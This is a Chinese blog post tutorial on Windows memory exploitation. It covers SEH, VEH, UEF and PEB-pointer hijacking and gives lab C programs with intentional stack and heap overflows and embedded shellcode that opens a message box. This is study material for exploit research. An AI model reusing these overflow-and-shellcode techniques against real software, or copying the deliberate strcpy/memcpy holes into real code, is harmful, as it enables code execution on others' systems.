<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="chinese">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="0day安全,">










<meta name="description" content="近些年来的一些新型漏洞利用思路和攻击技巧">
<meta name="keywords" content="0day安全">
<meta property="og:type" content="article">
<meta property="og:title" content="内存攻击技术">
<meta property="og:url" content="http://yoursite.com/2019/08/06/内存攻击技术/index.html">
<meta property="og:site_name" content="loser的博客">
<meta property="og:description" content="近些年来的一些新型漏洞利用思路和攻击技巧">
<meta property="og:locale" content="chinese">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/1.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/2.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/3.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/4.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/5.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/6.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/7.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/8.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/9.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/10.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/11.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/12.png">
<meta property="og:image" content="http://yoursite.com/2019/08/06/内存攻击技术/13.png">
<meta property="og:updated_time" content="2019-08-12T01:00:02.074Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内存攻击技术">
<meta name="twitter:description" content="近些年来的一些新型漏洞利用思路和攻击技巧">
<meta name="twitter:image" content="http://yoursite.com/2019/08/06/内存攻击技术/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/08/06/内存攻击技术/">





  <title>内存攻击技术 | loser的博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="chinese">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">loser的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/06/内存攻击技术/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="loser">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="loser的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">内存攻击技术</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-06T16:05:28+08:00">
                2019-08-06
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>近些年来的一些新型漏洞利用思路和攻击技巧<br><a id="more"></a></p>
<h1 id="狙击Windows-异常处理机制"><a href="#狙击Windows-异常处理机制" class="headerlink" title="狙击Windows 异常处理机制"></a>狙击Windows 异常处理机制</h1><h2 id="S-E-H-概述"><a href="#S-E-H-概述" class="headerlink" title="S.E.H 概述"></a>S.E.H 概述</h2><p>S.E.H 即异常处理结构体（Structure Exception Handler）,它是Windows 异常处理机制所采用的重要数据结构。每个S.E.H 包含两个DWORD 指针：S.E.H 链表指针和异常处理函数句柄，共8 个字节，如图所示</p>
<p><img src="1.png" alt=""><br>初步了解:<br>（1）S.E.H 结构体存放在系统栈中。</p>
<p>（2）当线程初始化时，会自动向栈中安装一个S.E.H，作为线程默认的异常处理。</p>
<p>（3）如果程序源代码中使用了<strong>try{}</strong>except{}或者Assert 宏等异常处理机制，编译器将最终通过向当前函数栈帧中安装一个S.E.H 来实现异常处理。</p>
<p>（4）栈中一般会同时存在多个S.E.H。</p>
<p>（5）栈中的多个S.E.H 通过链表指针在栈内由栈顶向栈底串成单向链表，位于链表最顶端的S.E.H 通过T.E.B（线程环境块）0 字节偏移处的指针标识。</p>
<p>（6）当异常发生时，操作系统会中断程序，并首先从T.E.B 的0 字节偏移处取出距离栈顶最近的S.E.H，使用异常处理函数句柄所指向的代码来处理异常。</p>
<p>（7）当离“事故现场”最近的异常处理函数运行失败时，将顺着S.E.H 链表依次尝试其他的异常处理函数。</p>
<p>（8）如果程序安装的所有异常处理函数都不能处理，系统将采用默认的异常处理函数。通常，这个函数会弹出一个错误对话框，然后强制关闭程序。</p>
<p>S.E.H链表：<br><img src="2.png" alt=""><br>S.E.H 就是在系统关闭程序之前，给程序一个执行预先设定的回调函数（call back）的机会<br>（1）S.E.H 存放在栈内，故溢出缓冲区的数据有可能淹没S.E.H。<br>（2）精心制造的溢出数据可以把S.E.H 中异常处理函数的入口地址更改为shellcode 的起始地址。<br>（3）溢出后错误的栈帧或堆块数据往往会触发异常。<br>（4）当Windows 开始处理溢出后的异常时，会错误地把shellcode 当作异常处理函数而执行。</p>
<h2 id="在栈溢出中利用S-E-H"><a href="#在栈溢出中利用S-E-H" class="headerlink" title="在栈溢出中利用S.E.H"></a>在栈溢出中利用S.E.H</h2><p>代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;windows.h&gt;</span><br><span class="line">char shellcode[] = &quot;\x90\x90\x90\x90……&quot;;</span><br><span class="line">DWORD MyExceptionhandler(void)</span><br><span class="line">&#123;</span><br><span class="line">printf(&quot;got an exception, press Enter to kill process!\n&quot;);</span><br><span class="line">getchar();</span><br><span class="line">ExitProcess(1);</span><br><span class="line">&#125;</span><br><span class="line">void test(char * input)</span><br><span class="line">&#123;</span><br><span class="line">char buf[200];</span><br><span class="line">int zero=0;</span><br><span class="line">__asm int 3 //used to break process for debug</span><br><span class="line">__try</span><br><span class="line">&#123;</span><br><span class="line">strcpy(buf,input); //overrun the stack</span><br><span class="line">zero=4/zero; //generate an exception</span><br><span class="line">&#125;</span><br><span class="line">__except(MyExceptionhandler())&#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line">main()</span><br><span class="line">&#123;</span><br><span class="line">test(shellcode);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>简单解释：<br>（1）函数test 中存在典型的栈溢出漏洞。<br>（2）<strong>try{}会在test 的函数栈帧中安装一个S.E.H 结构。<br>（3）</strong>try 中的除零操作会产生一个异常。<br>（4）当strcpy 操作没有产生溢出时，除零操作的异常将最终被MyExceptionhandler 函数处理。</p>
<p>（5）当strcpy 操作产生溢出，并精确地将栈帧中的S.E.H 异常处理句柄修改为shellcode 的入口地址时，操作系统将会错误地使用shellcode 去处理除零异常，也就是说，代码植入成功。</p>
<p>（6）此外，异常处理机制与堆分配机制类似，会检测进程是否处于调试状态。如果直接使用调试器加载程序，异常处理会进入调试状态下的处理流程。因此，我们这里同样采用直接在代码中加入断点_asm int 3，让进程自动中断后再用调试器attach 的方法进行调试。</p>
<p>这个实验用来确定栈帧中的S.E.H回调句柄的偏移精确地淹没这个位置，将该句柄修改为shellcode 的起始位置。</p>
<p>数组中的0x90 能够帮我们在调试器中轻易地确定shellcode 的起始位置0x0012FE98。</p>
<p><img src="3.png" alt=""><br>OllyDbg 当前线程一共安装了3 个S.E.H，离栈顶最近的位于0x0012FF68，如果在当前函数内发生异常，首先使用的将是这个S.E.H。我们回到栈中看看这个S.E.H 的状况，OllyDbg已经自动为它加上了注释，如图所示</p>
<p>这个S.E.H 就在离EBP 与函数返回地址不远的地方，0x0012FF68 为指向下一个S.E.H 的链表指针，0x0012FF6C 处的指针0x00401214 则是我们需要修改的异常回调函数句柄。</p>
<p><img src="4.png" alt=""><br><img src="5.png" alt=""><br>剩下的工作就是组织缓冲区，把0x0012FF6C 处的回调句柄修改成shellcode 的起始地址0x0012FE98。</p>
<p>缓冲区起始地址0x0012FE98 与异常句柄0x0012FF6C 之间共有212 个字节的间隙，也就是说，超出缓冲区12 个字节后的部分将覆盖S.E.H。</p>
<p>仍然使用弹出“failwest”消息框的shellcode 进行测试，将不足212 字节的部分用0x90 字节补齐；213~216 字节使用0x0012FE98 填充，用于更改异常回调函数的句柄；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;windows.h&gt;</span><br><span class="line">char shellcode[]=</span><br><span class="line">&quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&quot;</span><br><span class="line">&quot;\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&quot;</span><br><span class="line">&quot;\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&quot;</span><br><span class="line">&quot;\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&quot;</span><br><span class="line">&quot;\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&quot;</span><br><span class="line">&quot;\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&quot;</span><br><span class="line">&quot;\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&quot;</span><br><span class="line">&quot;\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&quot;</span><br><span class="line">&quot;\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&quot;</span><br><span class="line">&quot;\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&quot;</span><br><span class="line">&quot;\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\x90\x90\x90\x90\x98\xFE\x12\x00&quot;;</span><br><span class="line">DWORD MyExceptionhandler(void)</span><br><span class="line">&#123;</span><br><span class="line">printf(&quot;got an exception, press Enter to kill process!\n&quot;);</span><br><span class="line">getchar();</span><br><span class="line">ExitProcess(1);</span><br><span class="line">&#125;</span><br><span class="line">void test(char * input)</span><br><span class="line">&#123;</span><br><span class="line">char buf[200];</span><br><span class="line">int zero=0;</span><br><span class="line">_try</span><br><span class="line">&#123;</span><br><span class="line">strcpy(buf,input); //overrun the stack</span><br><span class="line">zero=4/zero; //generate an exception</span><br><span class="line">&#125;</span><br><span class="line">_except(MyExceptionhandler())&#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line">main()</span><br><span class="line">&#123;</span><br><span class="line">test(shellcode);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译运行后：<br><img src="6.png" alt=""><br>这时操作系统将错误地使用shellcode 去处理除零异常，从而使植入的代码获得执行。</p>
<h2 id="在堆溢出中利用S-E-H"><a href="#在堆溢出中利用S-E-H" class="headerlink" title="在堆溢出中利用S.E.H"></a>在堆溢出中利用S.E.H</h2><p>堆中发生溢出后往往同时伴随着异常的产生，所以，S.E.H 也是堆溢出中DWORD SHOOT常常选用的目标</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;windows.h&gt;</span><br><span class="line">char shellcode[]=</span><br><span class="line">&quot;\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&quot;</span><br><span class="line">&quot;\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&quot;</span><br><span class="line">&quot;\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&quot;</span><br><span class="line">&quot;\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&quot;</span><br><span class="line">&quot;\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&quot;</span><br><span class="line">&quot;\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&quot;</span><br><span class="line">&quot;\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&quot;</span><br><span class="line">&quot;\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&quot;</span><br><span class="line">&quot;\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&quot;</span><br><span class="line">&quot;\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&quot;</span><br><span class="line">&quot;\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\x16\x01\x1A\x00\x00\x10\x00\x00&quot;// head of the ajacent free block</span><br><span class="line">&quot;\x88\x06\x52\x00&quot;//0x00520688 is the address of shellcode in first</span><br><span class="line">//Heapblock</span><br><span class="line">&quot;\x90\x90\x90\x90&quot;;//target of DWORD SHOOT</span><br><span class="line">DWORD MyExceptionhandler(void)</span><br><span class="line">&#123;</span><br><span class="line">ExitProcess(1);</span><br><span class="line">&#125;</span><br><span class="line">main()</span><br><span class="line">&#123;</span><br><span class="line">HLOCAL h1 = 0, h2 = 0;</span><br><span class="line">HANDLE hp;</span><br><span class="line">hp = HeapCreate(0,0x1000,0x10000);</span><br><span class="line">h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);</span><br><span class="line">memcpy(h1,shellcode,0x200);// over flow here, noticed 0x200 means</span><br><span class="line">//512 !</span><br><span class="line">__asm int 3 // uesd to break the process</span><br><span class="line">__try</span><br><span class="line">&#123;</span><br><span class="line">h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);</span><br><span class="line">&#125;</span><br><span class="line">__except(MyExceptionhandler())&#123;&#125;</span><br><span class="line">return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>对实验思路和代码简要解释如下。<br>（1）溢出第一个堆块的数据将写入后面的空闲堆块，在第二次堆分配时发生DWORDSHOOT。<br>（2）将S.E.H 的异常回调函数地址作为DWORD SHOOT 的目标，将其替换为shellcode 的入口地址，异常发生后，操作系统将错误地把shellcode 当作异常处理函数而执行</p>
<p>先将OD的调试异常设置：<br><img src="7.png" alt=""><br>然后运行 程序自动停下来<br><img src="8.png" alt=""><br>查看SEH的情况<br><img src="9.png" alt=""><br>发现离第一个S.E.H 位于0x0012FF2C 的地方，那么异常回调函数的句柄应该位于这个地址后4 个字节的位置0x0012FF30。现在，将DWORD SHOOT 的目标地址由0x90909090 改为0x0012FF30，去掉程序中的中断指令，重新编译运行 </p>
<p><img src="10.png" alt=""></p>
<h2 id="深入挖掘Windows-异常处理"><a href="#深入挖掘Windows-异常处理" class="headerlink" title="深入挖掘Windows 异常处理"></a>深入挖掘Windows 异常处理</h2><p>（1）不同级别的S.E.H<br>最简单的异常处理流程:<br>􀁺 首先执行线程中距离栈顶最近的S.E.H 的异常处理函数。<br>􀁺 若失败，则依次尝试执行S.E.H 链表中后续的异常处理函数。<br>􀁺 若S.E.H 链中所有的异常处理函数都没能处理异常，则执行进程中的异常处理。<br>􀁺 若仍然失败，系统默认的异常处理将被调用，程序崩溃的对话框将被弹出。<br>（2）线程的异常处理<br>线程中的用于处理异常的回调函数有4 个参数。<br>􀁺 pExcept：指向一个非常重要的结构体EXCEPTION_RECORD。该结构体包含了若干<br>与异常相关的信息，如异常的类型、异常发生的地址等。<br>􀁺 pFrame：指向栈帧中的S.E.H 结构体。<br>􀁺 pContext：指向Context 结构体。该结构体中包含了所有寄存器的状态。<br>􀁺 pDispatch：未知用途。<br>在回调函数执行前，操作系统会将上述异常发生时的断点信息压栈。根据这些对异常的描述，回调函数可以轻松地处理异常。例如，遇到除零异常时，可以把相关寄存器的值修改为非0；内存访问错误时，可以重新把寄存器指回有效地址等。</p>
<p>这种回调函数返回后，操作系统会根据返回的结果决定下一步应该做什么。异常处理函数<br>可能返回两种结果:<br>0 （ExceptionContinueExcetution）：代表异常被成功处理，将返回原程序发生异常的地方，继续执行后续指令。</p>
<p>1 （ExceptionContinueSearch）：代表异常处理失败，将顺着S.E.H 链表搜索其他可用于异常处理的函数并尝试处理。</p>
<p>线程的异常处理中还有一个比较神秘的操作叫做unwind 操作，这个操作会对我们已经建立起来的异常处理流程的概念再做一点修改。</p>
<p>当异常发生时，系统会顺着S.E.H 链表搜索能够处理异常的句柄；一旦找到了恰当的句柄，系统会将已经遍历过的S.E.H 中的异常处理函数再调用一遍，这个过程就是所谓的unwind 操作，这第二轮的调用就是unwind 调用。</p>
<p>unwind 调用的主要目的是“通知”前边处理异常失败的S.E.H，系统已经准备将它们“遗弃”了，请它们立刻清理现场，释放资源，之后这些S.E.H 结构体将被从链表中拆除。</p>
<p>unwind 操作就是为了避免在进行多次异常处理，甚至进行互相嵌套的异常处理时（执行异常处理函数中又产生异常），仍能使这套机制稳定、正确地执行</p>
<p>（3）进程的异常处理<br>进程的异常处理函数的返回值有以下3 种。<br>􀁺 1（EXCEPTION_EXECUTE_HANDLER）：表示错误得到正确的处理，程序将退出。<br>􀁺 0（EXCEPTION_CONTINUE_SEARCH）：无法处理错误，将错误转交给系统默认的异常处理。</p>
<p>􀁺 -1（EXCEPTION_CONTINUE_EXECUTION）：表示错误得到正确的处理，并将继续执行下去。类似于线程的异常处理，系统会用回调函数的参数恢复出异常发生时的断点状况，但这时引起异常的寄存器值应该已经得到了修复。</p>
<p>（4）系统默认的异常处理U.E.F<br>如果进程异常处理失败或者用户根本没有注册进程异常处理，系统默认的异常处理函数UnhandledExceptionFilter（）会被调用。看到函数名，顾名思义，这个函数好像一个“筛选器”，所有无法处理的异常都将被它捕获并处理，不会出现任何漏网之鱼。有时我们会将这个“终极”异常处理函数简称为U.E.F（Unhandled Exception Filter）。</p>
<p>（5）异常处理流程的总结<br>至此，异常处理的流程已经被扩充地与真实的流程比较接近了，总结出以下几点。<br>􀁺 CPU 执行时发生并捕获异常，内核接过进程的控制权，开始内核态的异常处理。</p>
<p>􀁺 内核异常处理结束，将控制权还给ring3。</p>
<p>􀁺 ring3 中第一个处理异常的函数是ntdll.dll 中的KiUserExceptionDispatcher()函数。</p>
<p>􀁺 KiUserExceptionDispatcher()首先检查程序是否处于调试状态。如果程序正在被调试，会将异常交给调试器进行处理。</p>
<p>􀁺 在非调试状态下，KiUserExceptionDispatcher()调用RtlDispatchException()函数对线程的S.E.H 链表进行遍历，如果找到能够处理异常的回调函数，将再次遍历先前调用过的S.E.H 句柄，即unwind 操作，以保证异常处理机制自身的完整性。</p>
<p>􀁺 如果栈中所有的S.E.H 都失败了，且用户曾经使用过SetUnhandledExceptionFilter()函数设定进程异常处理，则这个异常处理将被调用。</p>
<p>􀁺 如果用户自定义的进程异常处理失败，或者用户根本没有定义进程异常处理，那么系统默认的异常处理UnhandledExceptionFilter()将被调用。U.E.F 会根据注册表里的相关信息决定是默默地关闭程序，还是弹出错误对话框。</p>
<p>以上就是Windows 异常处理的基本流程。需要额外注意的是，这个流程是基于Windows2000 平台的， Windows XP 及其以后的操作系统的异常处理流程大致相同， 只是KiUserExceptionDispatcher()在遍历栈帧中的S.E.H 之前，会去先尝试一种新加入的异常处理类型V.E.H（Vectored Exception Handling）。</p>
<h2 id="其他异常处理机制的利用思路"><a href="#其他异常处理机制的利用思路" class="headerlink" title="其他异常处理机制的利用思路"></a>其他异常处理机制的利用思路</h2><p><strong>1.V.E.H（Vectored Exception Handler，向量化异常处理）</strong><br>（1）V.E.H 和进程异常处理类似，都是基于进程的，而且需要使用API 注册回调函数。相关API 如下所示<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">PVOID AddVectoredExceptionHandler(</span><br><span class="line">ULONG FirstHandler,</span><br><span class="line">PVECTORED_EXCEPTION_HANDLER VectoredHandler</span><br><span class="line">);</span><br></pre></td></tr></table></figure></p>
<p>（2）MSDN 上有对V.E.H 结构的描述。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">struct _VECTORED_EXCEPTION_NODE</span><br><span class="line">&#123;</span><br><span class="line">DWORD m_pNextNode;</span><br><span class="line">DWORD m_pPreviousNode;</span><br><span class="line">PVOID m_pfnVectoredHandler;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>（3）可以注册多个V.E.H，V.E.H 结构体之间串成双向链表，因此比S.E.H 多了一个前向指针。</p>
<p>（4）V.E.H 处理优先级次于调试器处理，高于S.E.H 处理；即KiUserExceptionDispatcher()首先检查是否被调试，然后检查V.E.H 链表，最后检查S.E.H 链表。</p>
<p>（5）注册V.E.H 时，可以指定其在链中的位置，不一定像S.E.H 那样必须按照注册的顺序压入栈中，因此，V.E.H 使用起来更加灵活。</p>
<p>（6）V.E.H 保存在堆中。<br>（7）最后，unwind 操作只对栈帧中的S.E.H 链起作用，不会涉及V.E.H 这种进程类的异常处理。</p>
<p><strong>2.攻击TEB 中的S.E.H 头节点</strong><br>异常发生时，异常处理机制会遍历S.E.H 链表寻找合适的出错函数。前面已经介绍过，线程的S.E.H 链通过TEB 的第一个DWORD 标识(fs:0)，这个指针永远指向离栈顶最近的那个S.E.H。如果能够修改TEB 中的这个指针，在异常发生时就能将程序引导到shellcode 中去执行。</p>
<p>TEB 的知识：<br>（1）一个进程中可能同时存在多个线程。<br>（2）每个线程都有一个线程环境块TEB。<br>（3）第一个TEB 开始于地址0x7FFDE000。<br>（4）之后新建线程的TEB 将紧随前边的TEB，之间相隔0x1000 字节，并向内存低址方向增长。<br>（5）当线程退出时，对应的TEB 也被销毁，腾出的TEB 空间可以被新建的线程重复使用。<br>当遇到多线程的程序（尤其是服务器程序）时，我们将很难判断当前的线程是哪一个，以及对应的TEB 在什么位置。因此，攻击TEB 中S.E.H 头节点的方法一般用于单线程的程序。</p>
<p><strong>3．攻击U.E.F</strong><br>U.E.F（UnhandledExceptionFilter()）即系统默认的异常处理函数，是系统处理异常的最<br>后一个环节。如果能够利用堆溢出产生的DWORD SHOOT 把这个“终极异常处理函数”的调用句柄覆盖为shellcode 的入口地址，再制造一个其他异常处理都无法解决的异常，那么当系统使用U.E.F 作为最后一根救命稻草来解决异常时，shellcode 就可以堂而皇之地得到执行。</p>
<p>确定U.E.F 句柄的具体方法，那就是反汇编kernel32.dll 中的导出函数SetUnhandledExceptionFilter()<br><strong>4.攻击PEB 中的函数指针</strong><br>当U.E.F 被使用后，将最终调用ExitProcess()来结束程序。ExitProcess()在清理现场的时候需要进入临界区以同步线程，因此会调用RtlEnterCriticalSection()和RtlLeaveCriticalSection()。</p>
<p>ExitProcess()是通过存放在PEB 中的一对指针来调用这两个函数的，如果能够在DWORDSHOOT 时把PEB 中的这对指针修改成shellcode 的入口地址，那么，在程序最终结束时，ExitProcess()将启动shellcode。</p>
